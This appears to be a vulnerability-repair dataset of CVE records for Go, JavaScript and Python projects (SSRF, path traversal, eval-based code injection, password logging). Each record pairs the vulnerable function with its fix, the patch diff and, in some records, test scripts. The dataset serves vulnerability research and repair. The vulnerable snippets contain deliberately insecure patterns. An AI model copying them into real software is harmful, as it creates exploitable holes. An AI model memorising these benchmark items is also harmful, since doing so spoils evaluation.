{"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/usememos/memos", "patch_url": ["https://github.com/usememos/memos/commit/6ffc09d86a1302c384ef085aa70c7bddb3ce7ba9"], "programing_language": "Go", "vul_func": [{"id": "vul_go_126_1", "commit": "125c9c9", "file_path": "api/v1/http_getter.go", "start_line": 13, "end_line": 19, "snippet": "func (*APIV1Service) registerGetterPublicRoutes(g *echo.Group) {\n\t// GET /get/httpmeta?url={url} - Get website meta.\n\tg.GET(\"/get/httpmeta\", GetWebsiteMetadata)\n\n\t// GET /get/image?url={url} - Get image.\n\tg.GET(\"/get/image\", GetImage)\n}"}, {"id": "vul_go_126_2", "commit": "125c9c9", "file_path": "api/v1/http_getter.go", "start_line": 21, "end_line": 45, "snippet": "// GetWebsiteMetadata godoc\n//\n//\t@Summary\tGet website metadata\n//\t@Tags\t\tget\n//\t@Produce\tjson\n//\t@Param\t\turl\tquery\t\tstring\t\t\ttrue\t\"Website URL\"\n//\t@Success\t200\t{object}\tgetter.HTMLMeta\t\"Extracted metadata\"\n//\t@Failure\t400\t{object}\tnil\t\t\t\t\"Missing website url | Wrong url\"\n//\t@Failure\t406\t{object}\tnil\t\t\t\t\"Failed to get website meta with url: %s\"\n//\t@Router\t\t/o/get/GetWebsiteMetadata [GET]\nfunc GetWebsiteMetadata(c echo.Context) error {\n\turlStr := c.QueryParam(\"url\")\n\tif urlStr == \"\" {\n\t\treturn echo.NewHTTPError(http.StatusBadRequest, \"Missing website url\")\n\t}\n\tif _, err := url.Parse(urlStr); err != nil {\n\t\treturn echo.NewHTTPError(http.StatusBadRequest, \"Wrong url\").SetInternal(err)\n\t}\n\n\thtmlMeta, err := getter.GetHTMLMeta(urlStr)\n\tif err != nil {\n\t\treturn echo.NewHTTPError(http.StatusNotAcceptable, fmt.Sprintf(\"Failed to get website meta with url: %s\", urlStr)).SetInternal(err)\n\t}\n\treturn c.JSON(http.StatusOK, htmlMeta)\n}"}], "fix_func": [{"id": "fix_go_126_1", "commit": "6ffc09d", "file_path": "api/v1/http_getter.go", "start_line": 13, "end_line": 16, "snippet": "func (*APIV1Service) registerGetterPublicRoutes(g *echo.Group) {\n\t// GET /get/image?url={url} - Get image.\n\tg.GET(\"/get/image\", GetImage)\n}"}], "vul_patch": "--- a/api/v1/http_getter.go\n+++ b/api/v1/http_getter.go\n@@ -1,7 +1,4 @@\n func (*APIV1Service) registerGetterPublicRoutes(g *echo.Group) {\n-\t// GET /get/httpmeta?url={url} - Get website meta.\n-\tg.GET(\"/get/httpmeta\", GetWebsiteMetadata)\n-\n \t// GET /get/image?url={url} - Get image.\n \tg.GET(\"/get/image\", GetImage)\n }\n\n--- a/api/v1/http_getter.go\n+++ /dev/null\n@@ -1,25 +0,0 @@\n-// GetWebsiteMetadata godoc\n-//\n-//\t@Summary\tGet website metadata\n-//\t@Tags\t\tget\n-//\t@Produce\tjson\n-//\t@Param\t\turl\tquery\t\tstring\t\t\ttrue\t\"Website URL\"\n-//\t@Success\t200\t{object}\tgetter.HTMLMeta\t\"Extracted metadata\"\n-//\t@Failure\t400\t{object}\tnil\t\t\t\t\"Missing website url | Wrong url\"\n-//\t@Failure\t406\t{object}\tnil\t\t\t\t\"Failed to get website meta with url: %s\"\n-//\t@Router\t\t/o/get/GetWebsiteMetadata [GET]\n-func GetWebsiteMetadata(c echo.Context) error {\n-\turlStr := c.QueryParam(\"url\")\n-\tif urlStr == \"\" {\n-\t\treturn echo.NewHTTPError(http.StatusBadRequest, \"Missing website url\")\n-\t}\n-\tif _, err := url.Parse(urlStr); err != nil {\n-\t\treturn echo.NewHTTPError(http.StatusBadRequest, \"Wrong url\").SetInternal(err)\n-\t}\n-\n-\thtmlMeta, err := getter.GetHTMLMeta(urlStr)\n-\tif err != nil {\n-\t\treturn echo.NewHTTPError(http.StatusNotAcceptable, fmt.Sprintf(\"Failed to get website meta with url: %s\", urlStr)).SetInternal(err)\n-\t}\n-\treturn c.JSON(http.StatusOK, htmlMeta)\n-}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-36157", "cve_description": "An issue was discovered in Grafana Cortex through 1.9.0. The header value X-Scope-OrgID is used to construct file paths for rules files, and if crafted to conduct directory traversal such as ae ../../sensitive/path/in/deployment pathname, then Cortex will attempt to parse a rules file at that location and include some of the contents in the error message. (Other Cortex API requests can also be sent a malicious OrgID header, e.g., tricking the ingester into writing metrics to a different location, but the effect is nuisance rather than information disclosure.)", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/cortexproject/cortex", "patch_url": ["https://github.com/cortexproject/cortex/commit/d9e1f81f40c607b9e97c2fc6db70ae54679917c4"], "programing_language": "Go", "vul_func": [{"id": "vul_go_22_1", "commit": "1e4e0ca", "file_path": "pkg/tenant/resolver.go", "start_line": 67, "end_line": 74, "snippet": "func (t *SingleResolver) TenantIDs(ctx context.Context) ([]string, error) {\n\t//lint:ignore faillint wrapper around upstream method\n\torgID, err := user.ExtractOrgID(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn []string{orgID}, err\n}"}], "fix_func": [{"id": "fix_go_22_1", "commit": "d9e1f81", "file_path": "pkg/tenant/resolver.go", "start_line": 91, "end_line": 97, "snippet": "func (t *SingleResolver) TenantIDs(ctx context.Context) ([]string, error) {\n\torgID, err := t.TenantID(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn []string{orgID}, err\n}"}, {"id": "fix_go_22_2", "commit": "d9e1f81", "file_path": "pkg/tenant/resolver.go", "start_line": 66, "end_line": 75, "snippet": "func containsUnsafePathSegments(id string) bool {\n\t// handle the relative reference to current and parent path.\n\tif id == \".\" || id == \"..\" {\n\t\treturn true\n\t}\n\n\treturn strings.ContainsAny(id, \"\\\\/\")\n}\n\nvar errInvalidTenantID = errors.New(\"invalid tenant ID\")"}, {"id": "fix_go_22_3", "commit": "d9e1f81", "file_path": "pkg/tenant/resolver.go", "start_line": 77, "end_line": 89, "snippet": "func (t *SingleResolver) TenantID(ctx context.Context) (string, error) {\n\t//lint:ignore faillint wrapper around upstream method\n\tid, err := user.ExtractOrgID(ctx)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tif containsUnsafePathSegments(id) {\n\t\treturn \"\", errInvalidTenantID\n\t}\n\n\treturn id, nil\n}"}], "vul_patch": "--- a/pkg/tenant/resolver.go\n+++ b/pkg/tenant/resolver.go\n@@ -1,6 +1,5 @@\n func (t *SingleResolver) TenantIDs(ctx context.Context) ([]string, error) {\n-\t//lint:ignore faillint wrapper around upstream method\n-\torgID, err := user.ExtractOrgID(ctx)\n+\torgID, err := t.TenantID(ctx)\n \tif err != nil {\n \t\treturn nil, err\n \t}\n\n--- /dev/null\n+++ b/pkg/tenant/resolver.go\n@@ -0,0 +1,10 @@\n+func containsUnsafePathSegments(id string) bool {\n+\t// handle the relative reference to current and parent path.\n+\tif id == \".\" || id == \"..\" {\n+\t\treturn true\n+\t}\n+\n+\treturn strings.ContainsAny(id, \"\\\\/\")\n+}\n+\n+var errInvalidTenantID = errors.New(\"invalid tenant ID\")\n\n--- /dev/null\n+++ b/pkg/tenant/resolver.go\n@@ -0,0 +1,13 @@\n+func (t *SingleResolver) TenantID(ctx context.Context) (string, error) {\n+\t//lint:ignore faillint wrapper around upstream method\n+\tid, err := user.ExtractOrgID(ctx)\n+\tif err != nil {\n+\t\treturn \"\", err\n+\t}\n+\n+\tif containsUnsafePathSegments(id) {\n+\t\treturn \"\", errInvalidTenantID\n+\t}\n+\n+\treturn id, nil\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-36157:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/cortex\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestSingleResolver$ github.com/cortexproject/cortex/pkg/tenant\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-36157:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/cortex\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(TestSingleResolver|TestMultiResolver)$' github.com/cortexproject/cortex/pkg/tenant\n"} {"cve_id": "CVE-2020-7675", "cve_description": "cd-messenger through 2.7.26 is vulnerable to Arbitrary Code Execution. User input provided to the `color` argument executed by the `eval` function resulting in code execution.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}}, "repo": "https://github.com/mikeerickson/cd-messenger", "patch_url": ["https://github.com/mikeerickson/cd-messenger/commit/cbdf7d8c06463388fd4f088bfbdc5eeaa65eba56"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_12_1", "commit": "f0ebcff", "file_path": "src/messenger-node.js", "start_line": "68", "end_line": "77", "snippet": " line: color => {\n if (color.length > 0) {\n try {\n eval(`cl.${color}()`); // eslint-disable-line\n }\n catch (e) {\n console.error(chalk.bgRed.bold(`Invalid Color: ${color}`));\n }\n }\n },"}], "fix_func": [{"id": "fix_js_12_1", "commit": "cbdf7d8", "file_path": "src/messenger-node.js", "start_line": 68, "end_line": 77, "snippet": " line: color => {\n if (color.length > 0) {\n if (typeof cl[color] === 'function') {\n cl[color]();\n }\n else {\n console.error(chalk.bgRed.bold(`Invalid Color: ${color}`));\n }\n }\n },"}], "vul_patch": "--- a/src/messenger-node.js\n+++ b/src/messenger-node.js\n@@ -1,9 +1,9 @@\n line: color => {\n if (color.length > 0) {\n- try {\n- eval(`cl.${color}()`); // eslint-disable-line\n+ if (typeof cl[color] === 'function') {\n+ cl[color]();\n }\n- catch (e) {\n+ else {\n console.error(chalk.bgRed.bold(`Invalid Color: ${color}`));\n }\n }\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-7675:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/cd-messenger\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest ./poc\n", "unit_test_cmd": null} {"cve_id": "CVE-2023-34097", "cve_description": "hoppscotch is an open source API development ecosystem. In versions prior to 2023.4.5 the database password is exposed in the logs when showing the database connection string. Attackers with access to read system logs will be able to elevate privilege with full access to the database. Users are advised to upgrade. There are no known workarounds for this vulnerability. ", "cwe_info": {"CWE-532": {"name": "Insertion of Sensitive Information into Log File", "description": "The product writes sensitive information to a log file."}}, "repo": "https://github.com/hoppscotch/hoppscotch", "patch_url": ["https://github.com/hoppscotch/hoppscotch/commit/15424903ede20b155d764abf4c4f7c2c84c11247"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_83_1", "commit": "1cce117", "file_path": "packages/hoppscotch-backend/src/main.ts", "start_line": "9", "end_line": "55", "snippet": "async function bootstrap() {\n console.log(`Running in production: ${process.env.PRODUCTION}`);\n console.log(`Port: ${process.env.PORT}`);\n console.log(`Database: ${process.env.DATABASE_URL}`);\n\n const app = await NestFactory.create(AppModule);\n\n app.use(\n session({\n secret: process.env.SESSION_SECRET,\n }),\n );\n\n // Increase fil upload limit to 50MB\n app.use(\n json({\n limit: '100mb',\n }),\n );\n\n if (process.env.PRODUCTION === 'false') {\n console.log('Enabling CORS with development settings');\n\n app.enableCors({\n origin: process.env.WHITELISTED_ORIGINS.split(','),\n credentials: true,\n });\n } else {\n console.log('Enabling CORS with production settings');\n\n app.enableCors({\n origin: process.env.WHITELISTED_ORIGINS.split(','),\n credentials: true,\n });\n }\n app.enableVersioning({\n type: VersioningType.URI,\n });\n app.use(cookieParser());\n await app.listen(process.env.PORT || 3170);\n}\n\nif (!process.env.GENERATE_GQL_SCHEMA) {\n bootstrap();\n} else {\n emitGQLSchemaFile();\n}"}], "fix_func": [{"id": "fix_js_83_1", "commit": "1542490", "file_path": "packages/hoppscotch-backend/src/main.ts", "start_line": "9", "end_line": "54", "snippet": "async function bootstrap() {\n console.log(`Running in production: ${process.env.PRODUCTION}`);\n console.log(`Port: ${process.env.PORT}`);\n\n const app = await NestFactory.create(AppModule);\n\n app.use(\n session({\n secret: process.env.SESSION_SECRET,\n }),\n );\n\n // Increase fil upload limit to 50MB\n app.use(\n json({\n limit: '100mb',\n }),\n );\n\n if (process.env.PRODUCTION === 'false') {\n console.log('Enabling CORS with development settings');\n\n app.enableCors({\n origin: process.env.WHITELISTED_ORIGINS.split(','),\n credentials: true,\n });\n } else {\n console.log('Enabling CORS with production settings');\n\n app.enableCors({\n origin: process.env.WHITELISTED_ORIGINS.split(','),\n credentials: true,\n });\n }\n app.enableVersioning({\n type: VersioningType.URI,\n });\n app.use(cookieParser());\n await app.listen(process.env.PORT || 3170);\n}\n\nif (!process.env.GENERATE_GQL_SCHEMA) {\n bootstrap();\n} else {\n emitGQLSchemaFile();\n}"}], "vul_patch": "--- a/packages/hoppscotch-backend/src/main.ts\n+++ b/packages/hoppscotch-backend/src/main.ts\n@@ -1,7 +1,6 @@\n async function bootstrap() {\n console.log(`Running in production: ${process.env.PRODUCTION}`);\n console.log(`Port: ${process.env.PORT}`);\n- console.log(`Database: ${process.env.DATABASE_URL}`);\n \n const app = await NestFactory.create(AppModule);\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-41228", "cve_description": "TensorFlow is an open source platform for machine learning. In affected versions TensorFlow's `saved_model_cli` tool is vulnerable to a code injection as it calls `eval` on user supplied strings. This can be used by attackers to run arbitrary code on the plaform where the CLI tool runs. However, given that the tool is always run manually, the impact of this is not severe. We have patched this by adding a `safe` flag which defaults to `True` and an explicit warning for users. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/tensorflow/tensorflow", "patch_url": ["https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7"], "programing_language": "Python", "vul_func": [{"id": "vul_py_174_1", "commit": "349172c", "file_path": "tensorflow/python/tools/saved_model_cli.py", "start_line": 524, "end_line": 550, "snippet": "def preprocess_input_exprs_arg_string(input_exprs_str):\n \"\"\"Parses input arg into dictionary that maps input key to python expression.\n\n Parses input string in the format of 'input_key=' into a\n dictionary that maps each input_key to its python expression.\n\n Args:\n input_exprs_str: A string that specifies python expression for input keys.\n Each input is separated by semicolon. For each input key:\n 'input_key='\n\n Returns:\n A dictionary that maps input keys to their values.\n\n Raises:\n RuntimeError: An error when the given input string is in a bad format.\n \"\"\"\n input_dict = {}\n\n for input_raw in filter(bool, input_exprs_str.split(';')):\n if '=' not in input_exprs_str:\n raise RuntimeError('--input_exprs \"%s\" format is incorrect. Please follow'\n '\"=\"' % input_exprs_str)\n input_key, expr = input_raw.split('=', 1)\n # ast.literal_eval does not work with numpy expressions\n input_dict[input_key] = eval(expr) # pylint: disable=eval-used\n return input_dict"}, {"id": "vul_py_174_2", "commit": "349172c", "file_path": "tensorflow/python/tools/saved_model_cli.py", "start_line": 611, "end_line": 711, "snippet": "def load_inputs_from_input_arg_string(inputs_str, input_exprs_str,\n input_examples_str):\n \"\"\"Parses input arg strings and create inputs feed_dict.\n\n Parses '--inputs' string for inputs to be loaded from file, and parses\n '--input_exprs' string for inputs to be evaluated from python expression.\n '--input_examples' string for inputs to be created from tf.example feature\n dictionary list.\n\n Args:\n inputs_str: A string that specified where to load inputs. Each input is\n separated by semicolon.\n * For each input key:\n '=' or\n '=[]'\n * The optional 'variable_name' key will be set to None if not specified.\n * File specified by 'filename' will be loaded using numpy.load. Inputs\n can be loaded from only .npy, .npz or pickle files.\n * The \"[variable_name]\" key is optional depending on the input file type\n as descripted in more details below.\n When loading from a npy file, which always contains a numpy ndarray, the\n content will be directly assigned to the specified input tensor. If a\n variable_name is specified, it will be ignored and a warning will be\n issued.\n When loading from a npz zip file, user can specify which variable within\n the zip file to load for the input tensor inside the square brackets. If\n nothing is specified, this function will check that only one file is\n included in the zip and load it for the specified input tensor.\n When loading from a pickle file, if no variable_name is specified in the\n square brackets, whatever that is inside the pickle file will be passed\n to the specified input tensor, else SavedModel CLI will assume a\n dictionary is stored in the pickle file and the value corresponding to\n the variable_name will be used.\n input_exprs_str: A string that specifies python expressions for inputs.\n * In the format of: '='.\n * numpy module is available as np.\n input_examples_str: A string that specifies tf.Example with dictionary.\n * In the format of: '=<[{feature:value list}]>'\n\n Returns:\n A dictionary that maps input tensor keys to numpy ndarrays.\n\n Raises:\n RuntimeError: An error when a key is specified, but the input file contains\n multiple numpy ndarrays, none of which matches the given key.\n RuntimeError: An error when no key is specified, but the input file contains\n more than one numpy ndarrays.\n \"\"\"\n tensor_key_feed_dict = {}\n\n inputs = preprocess_inputs_arg_string(inputs_str)\n input_exprs = preprocess_input_exprs_arg_string(input_exprs_str)\n input_examples = preprocess_input_examples_arg_string(input_examples_str)\n\n for input_tensor_key, (filename, variable_name) in inputs.items():\n data = np.load(file_io.FileIO(filename, mode='rb'), allow_pickle=True) # pylint: disable=unexpected-keyword-arg\n\n # When a variable_name key is specified for the input file\n if variable_name:\n # if file contains a single ndarray, ignore the input name\n if isinstance(data, np.ndarray):\n logging.warn(\n 'Input file %s contains a single ndarray. Name key \\\"%s\\\" ignored.'\n % (filename, variable_name))\n tensor_key_feed_dict[input_tensor_key] = data\n else:\n if variable_name in data:\n tensor_key_feed_dict[input_tensor_key] = data[variable_name]\n else:\n raise RuntimeError(\n 'Input file %s does not contain variable with name \\\"%s\\\".' %\n (filename, variable_name))\n # When no key is specified for the input file.\n else:\n # Check if npz file only contains a single numpy ndarray.\n if isinstance(data, np.lib.npyio.NpzFile):\n variable_name_list = data.files\n if len(variable_name_list) != 1:\n raise RuntimeError(\n 'Input file %s contains more than one ndarrays. Please specify '\n 'the name of ndarray to use.' % filename)\n tensor_key_feed_dict[input_tensor_key] = data[variable_name_list[0]]\n else:\n tensor_key_feed_dict[input_tensor_key] = data\n\n # When input is a python expression:\n for input_tensor_key, py_expr_evaluated in input_exprs.items():\n if input_tensor_key in tensor_key_feed_dict:\n logging.warn(\n 'input_key %s has been specified with both --inputs and --input_exprs'\n ' options. Value in --input_exprs will be used.' % input_tensor_key)\n tensor_key_feed_dict[input_tensor_key] = py_expr_evaluated\n\n # When input is a tf.Example:\n for input_tensor_key, example in input_examples.items():\n if input_tensor_key in tensor_key_feed_dict:\n logging.warn(\n 'input_key %s has been specified in multiple options. Value in '\n '--input_examples will be used.' % input_tensor_key)\n tensor_key_feed_dict[input_tensor_key] = example\n return tensor_key_feed_dict"}], "fix_func": [{"id": "fix_py_174_1", "commit": "8b202f0", "file_path": "tensorflow/python/tools/saved_model_cli.py", "start_line": 525, "end_line": 560, "snippet": "def preprocess_input_exprs_arg_string(input_exprs_str, safe=True):\n \"\"\"Parses input arg into dictionary that maps input key to python expression.\n\n Parses input string in the format of 'input_key=' into a\n dictionary that maps each input_key to its python expression.\n\n Args:\n input_exprs_str: A string that specifies python expression for input keys.\n Each input is separated by semicolon. For each input key:\n 'input_key='\n safe: Whether to evaluate the python expression as literals or allow\n arbitrary calls (e.g. numpy usage).\n\n Returns:\n A dictionary that maps input keys to their values.\n\n Raises:\n RuntimeError: An error when the given input string is in a bad format.\n \"\"\"\n input_dict = {}\n\n for input_raw in filter(bool, input_exprs_str.split(';')):\n if '=' not in input_exprs_str:\n raise RuntimeError('--input_exprs \"%s\" format is incorrect. Please follow'\n '\"=\"' % input_exprs_str)\n input_key, expr = input_raw.split('=', 1)\n if safe:\n try:\n input_dict[input_key] = ast.literal_eval(expr)\n except:\n raise RuntimeError(\n f'Expression \"{expr}\" is not a valid python literal.')\n else:\n # ast.literal_eval does not work with numpy expressions\n input_dict[input_key] = eval(expr) # pylint: disable=eval-used\n return input_dict"}, {"id": "fix_py_174_2", "commit": "8b202f0", "file_path": "tensorflow/python/tools/saved_model_cli.py", "start_line": 621, "end_line": 721, "snippet": "def load_inputs_from_input_arg_string(inputs_str, input_exprs_str,\n input_examples_str):\n \"\"\"Parses input arg strings and create inputs feed_dict.\n\n Parses '--inputs' string for inputs to be loaded from file, and parses\n '--input_exprs' string for inputs to be evaluated from python expression.\n '--input_examples' string for inputs to be created from tf.example feature\n dictionary list.\n\n Args:\n inputs_str: A string that specified where to load inputs. Each input is\n separated by semicolon.\n * For each input key:\n '=' or\n '=[]'\n * The optional 'variable_name' key will be set to None if not specified.\n * File specified by 'filename' will be loaded using numpy.load. Inputs\n can be loaded from only .npy, .npz or pickle files.\n * The \"[variable_name]\" key is optional depending on the input file type\n as descripted in more details below.\n When loading from a npy file, which always contains a numpy ndarray, the\n content will be directly assigned to the specified input tensor. If a\n variable_name is specified, it will be ignored and a warning will be\n issued.\n When loading from a npz zip file, user can specify which variable within\n the zip file to load for the input tensor inside the square brackets. If\n nothing is specified, this function will check that only one file is\n included in the zip and load it for the specified input tensor.\n When loading from a pickle file, if no variable_name is specified in the\n square brackets, whatever that is inside the pickle file will be passed\n to the specified input tensor, else SavedModel CLI will assume a\n dictionary is stored in the pickle file and the value corresponding to\n the variable_name will be used.\n input_exprs_str: A string that specifies python expressions for inputs.\n * In the format of: '='.\n * numpy module is available as np.\n input_examples_str: A string that specifies tf.Example with dictionary.\n * In the format of: '=<[{feature:value list}]>'\n\n Returns:\n A dictionary that maps input tensor keys to numpy ndarrays.\n\n Raises:\n RuntimeError: An error when a key is specified, but the input file contains\n multiple numpy ndarrays, none of which matches the given key.\n RuntimeError: An error when no key is specified, but the input file contains\n more than one numpy ndarrays.\n \"\"\"\n tensor_key_feed_dict = {}\n\n inputs = preprocess_inputs_arg_string(inputs_str)\n input_exprs = preprocess_input_exprs_arg_string(input_exprs_str, safe=False)\n input_examples = preprocess_input_examples_arg_string(input_examples_str)\n\n for input_tensor_key, (filename, variable_name) in inputs.items():\n data = np.load(file_io.FileIO(filename, mode='rb'), allow_pickle=True) # pylint: disable=unexpected-keyword-arg\n\n # When a variable_name key is specified for the input file\n if variable_name:\n # if file contains a single ndarray, ignore the input name\n if isinstance(data, np.ndarray):\n logging.warn(\n 'Input file %s contains a single ndarray. Name key \\\"%s\\\" ignored.'\n % (filename, variable_name))\n tensor_key_feed_dict[input_tensor_key] = data\n else:\n if variable_name in data:\n tensor_key_feed_dict[input_tensor_key] = data[variable_name]\n else:\n raise RuntimeError(\n 'Input file %s does not contain variable with name \\\"%s\\\".' %\n (filename, variable_name))\n # When no key is specified for the input file.\n else:\n # Check if npz file only contains a single numpy ndarray.\n if isinstance(data, np.lib.npyio.NpzFile):\n variable_name_list = data.files\n if len(variable_name_list) != 1:\n raise RuntimeError(\n 'Input file %s contains more than one ndarrays. Please specify '\n 'the name of ndarray to use.' % filename)\n tensor_key_feed_dict[input_tensor_key] = data[variable_name_list[0]]\n else:\n tensor_key_feed_dict[input_tensor_key] = data\n\n # When input is a python expression:\n for input_tensor_key, py_expr_evaluated in input_exprs.items():\n if input_tensor_key in tensor_key_feed_dict:\n logging.warn(\n 'input_key %s has been specified with both --inputs and --input_exprs'\n ' options. Value in --input_exprs will be used.' % input_tensor_key)\n tensor_key_feed_dict[input_tensor_key] = py_expr_evaluated\n\n # When input is a tf.Example:\n for input_tensor_key, example in input_examples.items():\n if input_tensor_key in tensor_key_feed_dict:\n logging.warn(\n 'input_key %s has been specified in multiple options. Value in '\n '--input_examples will be used.' % input_tensor_key)\n tensor_key_feed_dict[input_tensor_key] = example\n return tensor_key_feed_dict"}], "vul_patch": "--- a/tensorflow/python/tools/saved_model_cli.py\n+++ b/tensorflow/python/tools/saved_model_cli.py\n@@ -1,4 +1,4 @@\n-def preprocess_input_exprs_arg_string(input_exprs_str):\n+def preprocess_input_exprs_arg_string(input_exprs_str, safe=True):\n \"\"\"Parses input arg into dictionary that maps input key to python expression.\n \n Parses input string in the format of 'input_key=' into a\n@@ -6,8 +6,10 @@\n \n Args:\n input_exprs_str: A string that specifies python expression for input keys.\n- Each input is separated by semicolon. For each input key:\n+ Each input is separated by semicolon. For each input key:\n 'input_key='\n+ safe: Whether to evaluate the python expression as literals or allow\n+ arbitrary calls (e.g. numpy usage).\n \n Returns:\n A dictionary that maps input keys to their values.\n@@ -22,6 +24,13 @@\n raise RuntimeError('--input_exprs \"%s\" format is incorrect. Please follow'\n '\"=\"' % input_exprs_str)\n input_key, expr = input_raw.split('=', 1)\n- # ast.literal_eval does not work with numpy expressions\n- input_dict[input_key] = eval(expr) # pylint: disable=eval-used\n+ if safe:\n+ try:\n+ input_dict[input_key] = ast.literal_eval(expr)\n+ except:\n+ raise RuntimeError(\n+ f'Expression \"{expr}\" is not a valid python literal.')\n+ else:\n+ # ast.literal_eval does not work with numpy expressions\n+ input_dict[input_key] = eval(expr) # pylint: disable=eval-used\n return input_dict\n\n--- a/tensorflow/python/tools/saved_model_cli.py\n+++ b/tensorflow/python/tools/saved_model_cli.py\n@@ -49,7 +49,7 @@\n tensor_key_feed_dict = {}\n \n inputs = preprocess_inputs_arg_string(inputs_str)\n- input_exprs = preprocess_input_exprs_arg_string(input_exprs_str)\n+ input_exprs = preprocess_input_exprs_arg_string(input_exprs_str, safe=False)\n input_examples = preprocess_input_examples_arg_string(input_examples_str)\n \n for input_tensor_key, (filename, variable_name) in inputs.items():\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-23536", "cve_description": "Cortex provides multi-tenant, long term storage for Prometheus. A local file inclusion vulnerability exists in Cortex versions 1.13.0, 1.13.1 and 1.14.0, where a malicious actor could remotely read local files as a result of parsing maliciously crafted Alertmanager configurations when submitted to the Alertmanager Set Configuration API. Only users of the Alertmanager service where `-experimental.alertmanager.enable-api` or `enable_api: true` is configured are affected. Affected Cortex users are advised to upgrade to patched versions 1.13.2 or 1.14.1. However as a workaround, Cortex administrators may reject Alertmanager configurations containing the `api_key_file` setting in the `opsgenie_configs` section before sending to the Set Alertmanager Configuration API.\n", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/cortexproject/cortex", "patch_url": ["https://github.com/cortexproject/cortex/commit/03e023d8b012887b31cc268d0d011b01e1e65506"], "programing_language": "Go", "vul_func": [{"id": "vul_go_34_1", "commit": "e6a3da9", "file_path": "pkg/alertmanager/api.go", "start_line": 310, "end_line": 397, "snippet": "func validateAlertmanagerConfig(cfg interface{}) error {\n\tv := reflect.ValueOf(cfg)\n\tt := v.Type()\n\n\t// Skip invalid, the zero value or a nil pointer (checked by zero value).\n\tif !v.IsValid() || v.IsZero() {\n\t\treturn nil\n\t}\n\n\t// If the input config is a pointer then we need to get its value.\n\t// At this point the pointer value can't be nil.\n\tif v.Kind() == reflect.Ptr {\n\t\tv = v.Elem()\n\t\tt = v.Type()\n\t}\n\n\t// Check if the input config is a data type for which we have a specific validation.\n\t// At this point the value can't be a pointer anymore.\n\tswitch t {\n\tcase reflect.TypeOf(config.GlobalConfig{}):\n\t\tif err := validateGlobalConfig(v.Interface().(config.GlobalConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(commoncfg.HTTPClientConfig{}):\n\t\tif err := validateReceiverHTTPConfig(v.Interface().(commoncfg.HTTPClientConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(commoncfg.TLSConfig{}):\n\t\tif err := validateReceiverTLSConfig(v.Interface().(commoncfg.TLSConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(config.SlackConfig{}):\n\t\tif err := validateSlackConfig(v.Interface().(config.SlackConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\n\tcase reflect.TypeOf(config.VictorOpsConfig{}):\n\t\tif err := validateVictorOpsConfig(v.Interface().(config.VictorOpsConfig)); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\t// If the input config is a struct, recursively iterate on all fields.\n\tif t.Kind() == reflect.Struct {\n\t\tfor i := 0; i < t.NumField(); i++ {\n\t\t\tfield := t.Field(i)\n\t\t\tfieldValue := v.FieldByIndex(field.Index)\n\n\t\t\t// Skip any field value which can't be converted to interface (eg. primitive 